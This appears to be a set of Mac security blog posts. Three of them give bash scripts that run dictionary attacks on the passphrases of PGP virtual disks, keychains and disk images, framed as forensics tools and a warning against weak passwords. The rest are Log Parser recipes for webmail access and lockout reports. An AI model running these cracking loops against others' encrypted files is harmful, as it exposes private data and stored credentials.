Mac Shell Script – Crack PGP Virtual Disk (PGD)

Today I was not up for doing any full program code.  On top of that I recorded an upcoming Typical Mac User show with Victor, answering some listener questions about file encryption.  One of the things we talked about was PGP for Mac.  I got to wondering: what are the odds that they provide a command line option for mounting PGP encrypted disks?  Can I do yet another dictionary attack script?

Here is what I have initially found.  Note we are talking about a PGP virtual disk file set up for passphrase authentication, NOT key authentication.  You must have the commercial Mac PGP Whole Disk Encryption application installed.

There is a pgpdisk --mount command.  So can we toss it in a loop like we did for DMG files?  Why of course we can!  Note that you need to change the dictionary path and file to the one you want, and the same for the target .PGD file.  In the example below the PGD file is PGPTest, given with the full path minus the extension.

You will notice when you run your attack that you see some text about "Error -11998 – buffer too small".  This is because normally, if the passphrase you enter is wrong, pgpdisk will prompt you three more times.  By piping the word in at the front of the line with the echo we cause it to error out, which skips those extra entry attempts and keeps the loop going through the dictionary file.

#!/bin/bash
# Try each word in the dictionary file as the passphrase for the PGP virtual disk.
# Change the dictionary path and the disk path (given without the .pgd extension).
for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v "#")
do
    # Piping the word on stdin makes pgpdisk error out instead of re-prompting on a wrong passphrase
    echo -n "$word" | pgpdisk --mount /Volumes/MyBook/PGPDisks/PGPTest --passphrase "$word"
    if [[ $? = 0 ]]
    then
        echo "Password found!"
        echo "$word"
        exit 0
    fi
done
echo "password not found :("
exit 1


Mac Shell Script – Crack Keychain

While I work out an updated copy of crowbarDMG to go after keychains, I wanted to give you a quick shell script to achieve the same thing.  A long time ago I posted a script for going after DMG files.  It takes only a slight edit to make it work for keychain files.  You will want to change test.txt to your dictionary file and keytest.keychain to your desired keychain file.

#!/bin/bash
# Try each word in the dictionary file as the password for the keychain.
# Change ~/test.txt to your dictionary file and ~/keytest.keychain to the target keychain.
for word in $(cat ~/test.txt | grep -v "#")
do
    # security exits 0 only when the keychain unlocks
    security unlock-keychain -p "$word" ~/keytest.keychain
    if [[ $? = 0 ]]
    then
        echo "Password found"
        echo "$word"
        exit 0
    fi
done
echo "Password not found"
exit 1


SNMP Auditing

Here is an easy way to find all SNMP devices on your network and check whether they respond to any of a list of common community strings you want to test for, and to do it without risking a write access check.  I did the following on my Mac PowerBook using just the C compiler, cc.



Disc Image – Why not to use a plain Dictionary Word

In the process of playing with backing up to disc images I wanted to play around with how to automate the password entry. I may get into why in a future post. Whatever you do, do not use a plain dictionary word to secure your images. Here is why. I based it on the scripts I found at: http://ask.metafilter.com/47171/How-to-crack-a-disk-image

Modified and tested. It worked like a champ when I added my chosen password to a dictionary text file of words. In the example below I used a path to where I keep a large collection of dictionary files used for password cracking in forensics and the like. This is not the fastest thing in the world, but it works if the chosen password shows up in the word lists you throw at the image.

#!/bin/bash
# Try each word in the dictionary file as the password for the disk image.
# Change the dictionary path and the image path to your own.
for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v "#")
do
    # -stdinpass makes hdiutil read the password from stdin instead of prompting
    echo -n "$word" | hdiutil attach /Volumes/iPod/Backup/Backup.sparseimage -stdinpass
    if [[ $? = 0 ]]
    then
        echo "Password found!"
        echo "$word"
        exit 0
    fi
done
echo "password not found :("
exit 1


LogParser – MS Exchange Webmail User Access List

I had to make a list of who accessed the webmail system at work and when. Here is a way to do it with Log Parser if you have your IIS logs in the normal IIS W3C format.

  1. Get the IIS logs from the web server front end of the
    webmail server. Dump them into a location like g:\logs\owa
  2. Grab a copy of MS Log Parser
  3. Make a text file called WebAccess.sql and put the following
    commands in the sql text file.
    SELECT
    cs-username, Date
    INTO STDOUT
    FROM g:\logs\owa\*
    WHERE
    (cs-username IS NOT NULL)
    AND
    (sc-status = 200)
    GROUP BY Date, cs-username
  4. Put the MS Log Parser executable and your WebAccess.sql into the g:\logs folder
  5. Execute this command at a command line in the folder with MS Log
    Parser
    Logparser.exe file:WebAccess.sql -i:IISW3C -o:CSV
  6. If you want it to go to a file, just add > WebmailUsers.csv to the end
    of the command in step five above. That will redirect the output to a csv you can open in Excel.
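The following is an added example, not the post's own code: it reproduces in Python what the WebAccess.sql query does, so the filtering logic (drop entries with no cs-username, keep only sc-status 200, one row per user per day) can be checked on a few constructed IIS W3C log lines before running the real query over the OWA log folder. The log lines, field list and user names are constructed for the example.

```python
"""Build a per-day list of authenticated webmail users from IIS W3C logs.

Added example, not the original post's code: it mirrors the post's LogParser
query so the filtering can be checked on constructed input.
"""
from collections import defaultdict

# Constructed sample of an IIS W3C log. Real logs carry more fields; the
# "#Fields:" directive names them, and "-" means the value was not recorded
# (LogParser reads that as NULL, which is what "cs-username IS NOT NULL" tests).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-03-05 00:00:00
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2007-03-05 08:01:10 10.0.0.5 - GET /exchange/ 401
2007-03-05 08:01:12 10.0.0.5 CORP\\alice GET /exchange/ 200
2007-03-05 08:02:40 10.0.0.5 CORP\\alice GET /exchange/inbox 200
2007-03-05 09:15:03 10.0.0.9 CORP\\bob GET /exchange/ 200
2007-03-05 09:15:04 10.0.0.9 CORP\\bob GET /exchange/missing 404
2007-03-06 07:30:00 10.0.0.9 CORP\\bob GET /exchange/ 200
2007-03-06 07:31:00 10.0.0.7 - GET /exchange/ 401
"""


def parse_w3c(text):
    """Yield one dict per entry line, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]   # drop the "#Fields:" token itself
            continue
        if fields is None:
            raise ValueError("entry line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue                        # malformed line: skip, never misalign columns
        yield dict(zip(fields, values))


def webmail_access(text, ok_status="200"):
    """Return sorted (date, user) pairs for successful authenticated requests.

    Mirrors: SELECT cs-username, Date ... WHERE cs-username IS NOT NULL
             AND sc-status = 200 GROUP BY Date, cs-username
    """
    seen = set()
    for entry in parse_w3c(text):
        user = entry.get("cs-username", "-")
        if user == "-":                     # anonymous / not yet authenticated
            continue
        if entry.get("sc-status") != ok_status:
            continue
        seen.add((entry["date"], user))
    return sorted(seen)


def to_csv(rows):
    """Render rows the way LogParser's -o:CSV would, with a header line."""
    lines = ["cs-username,Date"]
    lines.extend(f"{user},{date}" for date, user in rows)
    return "\n".join(lines)


if __name__ == "__main__":
    print(to_csv(webmail_access(SAMPLE_LOG)))
```

Note that the 401 lines (the browser's first, unauthenticated request) and the 404 line are discarded, which is exactly what the sc-status = 200 clause in the query does; if you also want failed logons for the same period, the status filter is the one line to change.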

Fun with dumpevt and MS Log Parser

I have been having fun learning how to combine Dumpevt from Somarsoft and MS Log Parser. Let me say, once you start to get the hang of it you can do some cool things. Also, MS makes a great PDF on Security Event information. You can modify the below to make your own reports for those various IDs.
For example, the below makes a CSV (comma-separated file) showing all user accounts that had EventID 644 lockouts the previous day. Download dumpevt, MS Log Parser and the header file I made into one folder together. Then put the below commands into a bat file in the same folder. Remove my comments that are in bold.

  • First we call dumpevt for three domain controllers. Obviously this bat file has to be executed as a user who has rights to pull the logs remotely. Dumpevt will actually concatenate the dumps into one file.

del c:\logs\644.csv
del c:\logs\errors.txt
dumpevt /computer=PDC /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt
dumpevt /computer=BDC01 /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt
dumpevt /computer=BDC02 /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt

  • Second we create a temp.csv file concatenating the header I provided with the output of the dumpevt calls.

type dumpevt-header.csv > temp.csv
type 644.csv >> temp.csv

  • Next we call Log Parser. We tell it the input is in CSV format and that the first row is the header. We specify what format we want the timestamps in for output. Then we select all fields, parse out the user account name where EventID is 644 and the date is the previous day. We go from temp.csv into a new file temp2.csv and have the output in date-time order.

LogParser -i:CSV -headerRow on -iTSFormat:"yyyy-MM-dd" "SELECT *, SUBSTR(EXTRACT_TOKEN(Strings, 1, '^'), 23) AS Account INTO temp2.csv FROM temp.csv WHERE EventID = 644 AND Date = TO_DATE(SUB(SYSTEM_TIMESTAMP(), TIMESTAMP('2', 'd'))) ORDER BY Date, Time"

  • Last we run temp2.csv through Log Parser once more. This will generate a csv file called 644report.csv with the columns Date, Time, Computer and the Account that was locked out. Note it drops all entries where the user account name is blank. This happens with some 644 events; I am not sure yet why, but I am still teaching myself all about this log parsing and interpretation.

LogParser -i:CSV -headerRow on -iTSFormat:"yyyy-MM-dd" "SELECT Date, Time, Computer, Account INTO 644report.csv FROM temp2.csv WHERE STRLEN(Account) > 1"
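As an added example (not the post's batch file or header), the two Log Parser passes above carried out in Python on a constructed dumpevt-style CSV, so the '^' token extraction, the 23-character skip, the previous-day filter and the blank-account drop can be checked before pointing the real pipeline at exported logs. The column names EventID,Date,Time,Computer,Strings are an assumption, since the post's dumpevt-header.csv is not shown, and the Strings layout, computer names and account names are constructed for the example; the previous day is taken as the reference date minus one day rather than through the post's SYSTEM_TIMESTAMP expression.

```python
"""Report accounts locked out (EventID 644) on the previous day.

Added example, not the post's batch file: it reproduces the two LogParser
passes on a constructed dumpevt-style CSV. Assumed column names (the post's
dumpevt-header.csv is not shown): EventID,Date,Time,Computer,Strings.
"""
import csv
import io
from datetime import date, timedelta

# Constructed sample in the assumed header layout. The Strings field holds the
# event's insertion strings joined with '^', as the post's EXTRACT_TOKEN(Strings, 1, '^')
# implies; the account token is given a 23-character label so that skipping
# 23 characters (the post's SUBSTR(..., 23)) leaves the bare account name.
SAMPLE_CSV = """\
EventID,Date,Time,Computer,Strings
644,2007-03-04,23:58:01,PDC,Caller Machine Name: WS07^Target Account Name:   carol^Target Account ID: S-1-5-21-3
644,2007-03-05,08:14:22,PDC,Caller Machine Name: WS01^Target Account Name:   alice^Target Account ID: S-1-5-21-1
529,2007-03-05,08:14:20,PDC,Caller Machine Name: WS01^Target Account Name:   alice^Target Account ID: S-1-5-21-1
644,2007-03-05,08:09:55,BDC01,Caller Machine Name: WS03^Target Account Name:   bob^Target Account ID: S-1-5-21-2
644,2007-03-05,12:30:00,BDC02,Caller Machine Name: WS09^Target Account Name:   ^Target Account ID: S-1-5-21-9
644,2007-03-06,00:00:10,PDC,Caller Machine Name: WS02^Target Account Name:   dave^Target Account ID: S-1-5-21-4
"""

LOCKOUT_EVENT_ID = "644"
ACCOUNT_TOKEN_INDEX = 1      # second '^'-separated string (EXTRACT_TOKEN index 1)
ACCOUNT_LABEL_LEN = 23       # characters to skip before the account name (SUBSTR offset)


def account_from_strings(strings):
    """Pull the locked-out account out of the '^'-joined insertion strings."""
    tokens = strings.split("^")
    if len(tokens) <= ACCOUNT_TOKEN_INDEX:
        return ""
    return tokens[ACCOUNT_TOKEN_INDEX][ACCOUNT_LABEL_LEN:].strip()


def lockouts_previous_day(csv_text, today):
    """Return [(date, time, computer, account)] for 644 events dated today-1.

    `today` may be a datetime.date or an ISO string. Rows whose account name
    is blank are dropped, as the post's second pass does with STRLEN(Account) > 1.
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    target = (today - timedelta(days=1)).isoformat()
    rows = []
    for rec in csv.DictReader(io.StringIO(csv_text)):
        if rec["EventID"] != LOCKOUT_EVENT_ID or rec["Date"] != target:
            continue
        account = account_from_strings(rec["Strings"])
        if not account:
            continue
        rows.append((rec["Date"], rec["Time"], rec["Computer"], account))
    rows.sort(key=lambda r: (r[0], r[1]))   # ORDER BY Date, Time
    return rows


def write_report(rows):
    """Render the rows as the 644report.csv the post describes."""
    out = io.StringIO()
    w = csv.writer(out, lineterminator="\n")
    w.writerow(["Date", "Time", "Computer", "Account"])
    w.writerows(rows)
    return out.getvalue()


if __name__ == "__main__":
    print(write_report(lockouts_previous_day(SAMPLE_CSV, today="2007-03-06")))
```

Passing the reference date explicitly instead of reading the clock keeps the report reproducible, which matters when you re-run it during an investigation; the same choice is what makes the constructed sample checkable.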
